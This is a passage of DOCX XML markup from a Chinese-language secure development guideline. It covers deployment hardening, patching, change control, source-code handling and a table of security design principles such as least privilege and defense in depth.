        <w:pStyle w:val="62"/>
        <w:wordWrap/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息系统上线前增加安全验收环节，保证系统安全上线；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217554D6">
      <w:pPr>
        <w:pStyle w:val="62"/>
        <w:wordWrap/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息系统下线后增加安全退出环境，保证相关信息、防火墙规则、数据的安全处理。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038F1106">
      <w:pPr>
        <w:pStyle w:val="32"/>
      </w:pPr>
      <w:bookmarkStart w:id="115" w:name="_Toc15461966"/>
      <w:bookmarkStart w:id="116" w:name="_Toc11859789"/>
      <w:bookmarkStart w:id="117" w:name="_Toc15464579"/>
      <w:bookmarkStart w:id="118" w:name="_Toc394569412"/>
      <w:bookmarkStart w:id="119" w:name="_Toc28286"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全技术方面</w:t>
      </w:r>
      <w:bookmarkEnd w:id="115"/>
      <w:bookmarkEnd w:id="116"/>
      <w:bookmarkEnd w:id="117"/>
      <w:bookmarkEnd w:id="118"/>
      <w:bookmarkEnd w:id="119"/>
    </w:p>
    <w:p w14:paraId="11FCB5E2">
      <w:pPr>
        <w:pStyle w:val="62"/>
        <w:wordWrap/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行环境部署需要进行加固处理，Web应用访问数据库的用户需要采用最小权限原则，防止攻击者利用数据库缺陷进行权限提升等操作，同时对中间件软件，如WEBSPHERE、TOMCAT、JBOSS等，应进行降权运行处理，防止脚本木马直接获得系统权限；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3AEDF8">
      <w:pPr>
        <w:pStyle w:val="62"/>
        <w:wordWrap/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关注各个应用系统所使用程序、组件、第三方插件等安全现状，及时更新相应的补丁版本；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080377F9">
      <w:pPr>
        <w:pStyle w:val="62"/>
        <w:wordWrap/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加强对敏感服务器、配置文件、目录的访问控制，以免敏感配置信息泄露；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044879E8">
      <w:pPr>
        <w:pStyle w:val="62"/>
        <w:wordWrap/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加强信息系统安全配置检查工作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049849C8">
      <w:pPr>
        <w:pStyle w:val="32"/>
      </w:pPr>
      <w:bookmarkStart w:id="120" w:name="_Toc15461967"/>
      <w:bookmarkStart w:id="121" w:name="_Toc11859790"/>
      <w:bookmarkStart w:id="122" w:name="_Toc15464580"/>
      <w:bookmarkStart w:id="123" w:name="_Toc22420"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开发过程管理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="120"/>
      <w:bookmarkEnd w:id="121"/>
      <w:bookmarkEnd w:id="122"/>
      <w:bookmarkEnd w:id="123"/>
    </w:p>
    <w:p w14:paraId="530DB085">
      <w:pPr>
        <w:pStyle w:val="62"/>
        <w:wordWrap/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在系统开发与运行维护的所有阶段（如：计划需求、设计、编码、测试、运行和维护）强制实施严格的变更控制，对变更的申请、审核、测试、批准、执行计划与具体实施提出明确要求，确保系统安全性与控制措施不被损害；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534E6861">
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:wordWrap/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>变更控制包括以下内容：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E634372">
      <w:pPr>
        <w:pStyle w:val="70"/>
        <w:wordWrap/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>审查变更控制措施和流程的完整性，确保未被修改和破坏；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A95E9FD">
      <w:pPr>
        <w:pStyle w:val="70"/>
        <w:wordWrap/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>确保操作系统的更改不会对应用系统的安全性和完整性造成不良影响；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302EAE04">
      <w:pPr>
        <w:pStyle w:val="70"/>
        <w:wordWrap/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>确保系统文档在每次修改后得到及时更新，并确保旧文档被正确归档和处置；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B4F8E8">
      <w:pPr>
        <w:pStyle w:val="70"/>
        <w:wordWrap/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>做好软件升级的版本控制，如保存历史版本；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7D6D07">
      <w:pPr>
        <w:pStyle w:val="70"/>
        <w:wordWrap/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>保留所有变更的审计跟踪记录；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F89F593">
      <w:pPr>
        <w:pStyle w:val="70"/>
        <w:wordWrap/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>确保操作文档以及用户程序能在必要时被修改；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676A1B76">
      <w:pPr>
        <w:pStyle w:val="70"/>
        <w:wordWrap/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>确保及时更新业务连续性计划。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23681E8A">
      <w:pPr>
        <w:pStyle w:val="62"/>
        <w:wordWrap/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>针对开发人员对源代码的管理，应严禁将源代码信息上传至互联网上的网络磁盘或源代码仓库，如GITHUB、网盘等；建议建立自运营的代码管理仓库，如有必要上传至互联网上，应对敏感关键信息进行屏蔽，如API地址、IP地址、数据库密码等，防止信息泄露；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60523F28">
      <w:pPr>
        <w:pStyle w:val="62"/>
        <w:wordWrap/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应尽量避免修改厂商提供的软件包，如必须修改，应注意以下几点：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAACC6E">
      <w:pPr>
        <w:pStyle w:val="70"/>
        <w:wordWrap/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>评估软件包内置的控制措施和完整性流程遭受破坏的风险；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCB115B">
      <w:pPr>
        <w:pStyle w:val="70"/>
        <w:wordWrap/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应征得原厂商的同意，由原厂商提供标准的升级程序来实现软件包的更改。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F85CB1C">
      <w:pPr>
        <w:pStyle w:val="62"/>
        <w:wordWrap/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在软件的原始采购、开发、使用和维护过程中，应采取如下防范控制措施：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6637BBD7">
      <w:pPr>
        <w:pStyle w:val="70"/>
        <w:wordWrap/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>仅从信誉卓著的厂商处购买软件；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8E7FF0">
      <w:pPr>
        <w:pStyle w:val="70"/>
        <w:wordWrap/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>尽量购买提供源代码的软件，以便进行检验，在投入使用之前检查所有源代码；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE86DA3">
      <w:pPr>
        <w:pStyle w:val="70"/>
        <w:wordWrap/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用通过权威机构评估测试的软件产品；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DE7CDC">
      <w:pPr>
        <w:pStyle w:val="70"/>
        <w:wordWrap/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一旦安装完毕，控制对源代码的访问和修改；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725AAACC">
      <w:pPr>
        <w:pStyle w:val="70"/>
        <w:wordWrap/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装并正确使用有关后门、特洛伊代码的检测和查杀工具。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569197FB">
      <w:pPr>
        <w:pStyle w:val="62"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:wordWrap w:val="0"/>
        <w:bidi w:val="0"/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DDF580F">
      <w:pPr>
        <w:pStyle w:val="62"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:wordWrap w:val="0"/>
        <w:bidi w:val="0"/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D3D66F6">
      <w:pPr>
        <w:pStyle w:val="62"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:wordWrap w:val="0"/>
        <w:bidi w:val="0"/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43C8F0AB">
      <w:pPr>
        <w:pStyle w:val="62"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:wordWrap w:val="0"/>
        <w:bidi w:val="0"/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B94A043">
      <w:pPr>
        <w:pStyle w:val="62"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:wordWrap w:val="0"/>
        <w:bidi w:val="0"/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="730B2428">
      <w:pPr>
        <w:pStyle w:val="62"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:wordWrap w:val="0"/>
        <w:bidi w:val="0"/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B681B9C">
      <w:pPr>
        <w:pStyle w:val="62"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:wordWrap w:val="0"/>
        <w:bidi w:val="0"/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D029F0C">
      <w:pPr>
        <w:pStyle w:val="32"/>
      </w:pPr>
      <w:bookmarkStart w:id="124" w:name="_Toc11859791"/>
      <w:bookmarkStart w:id="125" w:name="_Toc15464581"/>
      <w:bookmarkStart w:id="126" w:name="_Toc15461968"/>
      <w:bookmarkStart w:id="127" w:name="_Toc4226"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全</w:t>
      </w:r>
      <w:r>
        <w:t>架构设计基本原则</w:t>
      </w:r>
      <w:bookmarkEnd w:id="124"/>
      <w:bookmarkEnd w:id="125"/>
      <w:bookmarkEnd w:id="126"/>
      <w:bookmarkEnd w:id="127"/>
    </w:p>
    <w:p w14:paraId="5ED8BD5C">
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:wordWrap/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在应用系统软件开发设计的过程中，对应用系统的总体设计应当满足如下安全原则</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="20"/>
        <w:tblW w:w="8276"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3059"/>
        <w:gridCol w:w="5217"/>
      </w:tblGrid>
      <w:tr w14:paraId="53B1B57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52" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3059" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="double" w:color="auto" w:sz="4" w:space="0"/>
              <w:left w:val="double" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:tl2br w:val="nil"/>
              <w:tr2bl w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="8EAADB" w:themeFill="accent5" w:themeFillTint="99"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3E236366">
            <w:pPr>
              <w:pStyle w:val="47"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>原则</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5217" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="double" w:color="auto" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:right w:val="double" w:color="auto" w:sz="4" w:space="0"/>
              <w:tl2br w:val="nil"/>
              <w:tr2bl w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="8EAADB" w:themeFill="accent5" w:themeFillTint="99"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="67C1B240">
            <w:pPr>
              <w:pStyle w:val="47"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5A226BF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059" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3" w:themeFill="accent5" w:themeFillTint="33"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2F33D66C">
            <w:pPr>
              <w:pStyle w:val="47"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>最小权限原则</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="115E29CF">
            <w:pPr>
              <w:pStyle w:val="47"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Least Privilege</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5217" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="12FF99C5">
            <w:pPr>
              <w:pStyle w:val="93"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>应用软件的每个模块如进程、用户只能访问当下所必需的信息或者资源。赋予每一个合法动作最小的权限，以保护数据以及功能避免受到错误或者恶意行为的破坏。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0898EBD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059" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3" w:themeFill="accent5" w:themeFillTint="33"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1BBFF1E8">
            <w:pPr>
              <w:pStyle w:val="47"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>权限分离原则</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CFCF135">
            <w:pPr>
              <w:pStyle w:val="47"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Separation of Duties</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5217" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="57805D41">
            <w:pPr>
              <w:pStyle w:val="93"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>对业务的操作、管理和审计权限应该由软件中的不同角色的用户分别承担；普通用户和管理员用户信息应该存放在不同的数据表中。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="660CF3C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059" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3" w:themeFill="accent5" w:themeFillTint="33"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4913B256">
            <w:pPr>
              <w:pStyle w:val="47"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>深度防御原则</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EB6FFD1">
            <w:pPr>
              <w:pStyle w:val="47"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Defense in Depth</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5217" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7AAC1264">
            <w:pPr>
              <w:pStyle w:val="93"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>在应用程序对业务数据进行处理的每个阶段都要考虑安全性问题，不能仅在某个阶段做安全防御，这样单点防御一旦被突破将造成安全风险。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="134C24D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059" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3" w:themeFill="accent5" w:themeFillTint="33"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="12679B3D">
            <w:pPr>
              <w:pStyle w:val="47"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>容错保护原则</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47786E75">
            <w:pPr>
              <w:pStyle w:val="47"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Fail Secure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5217" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4D26D026">
            <w:pPr>
              <w:pStyle w:val="93"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>当程序出现故障时或系统异常当系统失败时，可以进入到一个失败保护的状态。如果用户请求失败，系统仍可保障安全。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="65FA659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059" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3" w:themeFill="accent5" w:themeFillTint="33"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="288C4B92">
            <w:pPr>
              <w:pStyle w:val="47"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>单点异常终止原则</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5647AD9A">
            <w:pPr>
              <w:pStyle w:val="47"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Single Point of Failure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5217" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7FFECE7B">
            <w:pPr>
              <w:pStyle w:val="93"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>当用户提交数据超出预期时，应立即终止程序的执行，不要试图加以修正并继续执行下去。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="763D969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059" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3" w:themeFill="accent5" w:themeFillTint="33"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="238F79F2">
            <w:pPr>
              <w:pStyle w:val="47"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>外来代码安全原则</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1196D4DA">
            <w:pPr>
              <w:pStyle w:val="47"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Least</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Third Party Components </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5217" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1CCD5D6E">
            <w:pPr>
              <w:pStyle w:val="93"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>严格控制第三方函数与插件的使用，对外来代码必须进行详细的安全测试。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1A9633D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059" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3" w:themeFill="accent5" w:themeFillTint="33"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="303D666F">
            <w:pPr>
              <w:pStyle w:val="47"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>代码重用原则</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C8E3E3A">
            <w:pPr>
              <w:pStyle w:val="47"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">Leveraging Existing </w:t>
            </w:r>
            <w:r>
              <w:t>Components</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5217" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
